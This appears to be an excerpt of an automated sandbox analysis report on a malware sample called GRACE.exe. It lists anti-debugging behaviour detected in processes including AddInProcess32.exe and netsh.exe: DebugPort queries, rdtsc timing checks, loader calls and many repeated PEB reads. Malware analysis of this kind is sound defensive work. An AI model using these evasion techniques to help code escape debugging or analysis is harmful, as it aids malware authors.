Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\GRACE.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00409A90 rdtsc 10_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0040ACD0 LdrLoadDll, 10_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136513A mov eax, dword ptr fs:[00000030h] 10_2_0136513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136513A mov eax, dword ptr fs:[00000030h] 10_2_0136513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01354120 mov eax, dword ptr fs:[00000030h] 10_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01354120 mov eax, dword ptr fs:[00000030h] 10_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01354120 mov eax, dword ptr fs:[00000030h] 10_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01354120 mov eax, dword ptr fs:[00000030h] 10_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01354120 mov ecx, dword ptr fs:[00000030h] 10_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339100 mov eax, dword ptr fs:[00000030h] 10_2_01339100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339100 mov eax, dword ptr fs:[00000030h] 10_2_01339100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339100 mov eax, dword ptr fs:[00000030h] 10_2_01339100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133B171 mov eax, dword ptr fs:[00000030h] 10_2_0133B171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133B171 mov eax, dword ptr fs:[00000030h] 10_2_0133B171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133C962 mov eax, dword ptr fs:[00000030h] 10_2_0133C962
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135B944 mov eax, dword ptr fs:[00000030h] 10_2_0135B944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135B944 mov eax, dword ptr fs:[00000030h] 10_2_0135B944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B51BE mov eax, dword ptr fs:[00000030h] 10_2_013B51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B51BE mov eax, dword ptr fs:[00000030h] 10_2_013B51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B51BE mov eax, dword ptr fs:[00000030h] 10_2_013B51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B51BE mov eax, dword ptr fs:[00000030h] 10_2_013B51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov eax, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov eax, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov eax, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov eax, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013661A0 mov eax, dword ptr fs:[00000030h] 10_2_013661A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013661A0 mov eax, dword ptr fs:[00000030h] 10_2_013661A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F49A4 mov eax, dword ptr fs:[00000030h] 10_2_013F49A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F49A4 mov eax, dword ptr fs:[00000030h] 10_2_013F49A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F49A4 mov eax, dword ptr fs:[00000030h] 10_2_013F49A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F49A4 mov eax, dword ptr fs:[00000030h] 10_2_013F49A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B69A6 mov eax, dword ptr fs:[00000030h] 10_2_013B69A6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362990 mov eax, dword ptr fs:[00000030h] 10_2_01362990
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136A185 mov eax, dword ptr fs:[00000030h] 10_2_0136A185
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135C182 mov eax, dword ptr fs:[00000030h] 10_2_0135C182
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133B1E1 mov eax, dword ptr fs:[00000030h] 10_2_0133B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133B1E1 mov eax, dword ptr fs:[00000030h] 10_2_0133B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133B1E1 mov eax, dword ptr fs:[00000030h] 10_2_0133B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013C41E8 mov eax, dword ptr fs:[00000030h] 10_2_013C41E8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A830 mov eax, dword ptr fs:[00000030h] 10_2_0135A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A830 mov eax, dword ptr fs:[00000030h] 10_2_0135A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A830 mov eax, dword ptr fs:[00000030h] 10_2_0135A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A830 mov eax, dword ptr fs:[00000030h] 10_2_0135A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136002D mov eax, dword ptr fs:[00000030h] 10_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136002D mov eax, dword ptr fs:[00000030h] 10_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136002D mov eax, dword ptr fs:[00000030h] 10_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136002D mov eax, dword ptr fs:[00000030h] 10_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136002D mov eax, dword ptr fs:[00000030h] 10_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134B02A mov eax, dword ptr fs:[00000030h] 10_2_0134B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134B02A mov eax, dword ptr fs:[00000030h] 10_2_0134B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134B02A mov eax, dword ptr fs:[00000030h] 10_2_0134B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134B02A mov eax, dword ptr fs:[00000030h] 10_2_0134B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B7016 mov eax, dword ptr fs:[00000030h] 10_2_013B7016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B7016 mov eax, dword ptr fs:[00000030h] 10_2_013B7016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B7016 mov eax, dword ptr fs:[00000030h] 10_2_013B7016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01401074 mov eax, dword ptr fs:[00000030h] 10_2_01401074
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F2073 mov eax, dword ptr fs:[00000030h] 10_2_013F2073
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01404015 mov eax, dword ptr fs:[00000030h] 10_2_01404015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01404015 mov eax, dword ptr fs:[00000030h] 10_2_01404015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01350050 mov eax, dword ptr fs:[00000030h] 10_2_01350050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01350050 mov eax, dword ptr fs:[00000030h] 10_2_01350050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136F0BF mov ecx, dword ptr fs:[00000030h] 10_2_0136F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136F0BF mov eax, dword ptr fs:[00000030h] 10_2_0136F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136F0BF mov eax, dword ptr fs:[00000030h] 10_2_0136F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013790AF mov eax, dword ptr fs:[00000030h] 10_2_013790AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339080 mov eax, dword ptr fs:[00000030h] 10_2_01339080
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B3884 mov eax, dword ptr fs:[00000030h] 10_2_013B3884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B3884 mov eax, dword ptr fs:[00000030h] 10_2_013B3884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135B8E4 mov eax, dword ptr fs:[00000030h] 10_2_0135B8E4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135B8E4 mov eax, dword ptr fs:[00000030h] 10_2_0135B8E4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013340E1 mov eax, dword ptr fs:[00000030h] 10_2_013340E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013340E1 mov eax, dword ptr fs:[00000030h] 10_2_013340E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013340E1 mov eax, dword ptr fs:[00000030h] 10_2_013340E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013358EC mov eax, dword ptr fs:[00000030h] 10_2_013358EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov ecx, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01408B58 mov eax, dword ptr fs:[00000030h] 10_2_01408B58
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F131B mov eax, dword ptr fs:[00000030h] 10_2_013F131B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01363B7A mov eax, dword ptr fs:[00000030h] 10_2_01363B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01363B7A mov eax, dword ptr fs:[00000030h] 10_2_01363B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133DB60 mov ecx, dword ptr fs:[00000030h] 10_2_0133DB60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133F358 mov eax, dword ptr fs:[00000030h] 10_2_0133F358
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133DB40 mov eax, dword ptr fs:[00000030h] 10_2_0133DB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01364BAD mov eax, dword ptr fs:[00000030h] 10_2_01364BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01364BAD mov eax, dword ptr fs:[00000030h] 10_2_01364BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01364BAD mov eax, dword ptr fs:[00000030h] 10_2_01364BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362397 mov eax, dword ptr fs:[00000030h] 10_2_01362397
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136B390 mov eax, dword ptr fs:[00000030h] 10_2_0136B390
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F138A mov eax, dword ptr fs:[00000030h] 10_2_013F138A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01341B8F mov eax, dword ptr fs:[00000030h] 10_2_01341B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01341B8F mov eax, dword ptr fs:[00000030h] 10_2_01341B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013ED380 mov ecx, dword ptr fs:[00000030h] 10_2_013ED380
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] 10_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135DBE9 mov eax, dword ptr fs:[00000030h] 10_2_0135DBE9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013E23E3 mov ecx, dword ptr fs:[00000030h] 10_2_013E23E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013E23E3 mov ecx, dword ptr fs:[00000030h] 10_2_013E23E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013E23E3 mov eax, dword ptr fs:[00000030h] 10_2_013E23E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01405BA5 mov eax, dword ptr fs:[00000030h] 10_2_01405BA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B53CA mov eax, dword ptr fs:[00000030h] 10_2_013B53CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B53CA mov eax, dword ptr fs:[00000030h] 10_2_013B53CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01374A2C mov eax, dword ptr fs:[00000030h] 10_2_01374A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01374A2C mov eax, dword ptr fs:[00000030h] 10_2_01374A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] 10_2_0135A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01408A62 mov eax, dword ptr fs:[00000030h] 10_2_01408A62
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01335210 mov eax, dword ptr fs:[00000030h] 10_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01335210 mov ecx, dword ptr fs:[00000030h] 10_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01335210 mov eax, dword ptr fs:[00000030h] 10_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01335210 mov eax, dword ptr fs:[00000030h] 10_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133AA16 mov eax, dword ptr fs:[00000030h] 10_2_0133AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133AA16 mov eax, dword ptr fs:[00000030h] 10_2_0133AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01353A1C mov eax, dword ptr fs:[00000030h] 10_2_01353A1C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FAA16 mov eax, dword ptr fs:[00000030h] 10_2_013FAA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FAA16 mov eax, dword ptr fs:[00000030h] 10_2_013FAA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01348A0A mov eax, dword ptr fs:[00000030h] 10_2_01348A0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137927A mov eax, dword ptr fs:[00000030h] 10_2_0137927A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013EB260 mov eax, dword ptr fs:[00000030h] 10_2_013EB260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013EB260 mov eax, dword ptr fs:[00000030h] 10_2_013EB260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FEA55 mov eax, dword ptr fs:[00000030h] 10_2_013FEA55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013C4257 mov eax, dword ptr fs:[00000030h] 10_2_013C4257
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339240 mov eax, dword ptr fs:[00000030h] 10_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339240 mov eax, dword ptr fs:[00000030h] 10_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339240 mov eax, dword ptr fs:[00000030h] 10_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339240 mov eax, dword ptr fs:[00000030h] 10_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134AAB0 mov eax, dword ptr fs:[00000030h] 10_2_0134AAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134AAB0 mov eax, dword ptr fs:[00000030h] 10_2_0134AAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136FAB0 mov eax, dword ptr fs:[00000030h] 10_2_0136FAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] 10_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] 10_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] 10_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] 10_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] 10_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136D294 mov eax, dword ptr fs:[00000030h] 10_2_0136D294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136D294 mov eax, dword ptr fs:[00000030h] 10_2_0136D294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] 10_2_013F4AEF
